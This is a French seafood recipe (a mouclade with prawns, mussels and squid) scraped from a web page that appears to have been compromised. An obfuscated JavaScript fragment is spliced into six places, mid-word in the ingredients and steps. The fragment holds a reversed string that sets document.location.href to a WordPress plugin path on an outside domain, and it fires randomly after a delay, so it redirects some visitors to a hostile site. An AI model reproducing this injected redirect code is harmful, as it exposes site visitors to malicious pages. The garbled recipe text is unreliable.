
LA MOUCLADE FAÇON JOANNE !
Pour 6 Pers.
INGRÉDIENTS :
– 600g de grosses crevettes crues
– 600g de moules nettoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toyées
– 400g de calmars
– 2 oignons emincés
– 2 gousses d’ail hachées
– 1 piment rouge épépiné et haché
– 1 dose de safran
– 2 boîtes de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates en dés (2 x 400g)
– 1 CS de concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate
– 200ml de vin blanc
– 2 grosses pommes de terre coupées en petits dés
– Huile d’olive 2 CS
– Persil plat haché 2 CS
– sel & poivre du moulin
Faire rissoler l’ail, l’oignon, le piment et le concentré de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate à feu doux
Déglacer avec le vin blanc
Ajouter les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates, porter à ébullition, baisser le feu et laisser réduire.
Incorporer la pomme de terre et laisser mijoter 15 minutes. Assaisonner.
Ajouter les fruits de mer, couvrir et cuire environ 10 minutes à feu moyen
Répartir dans des assiettes creuses, parsemer de persil et servir immédiatement
Bon Appétit !
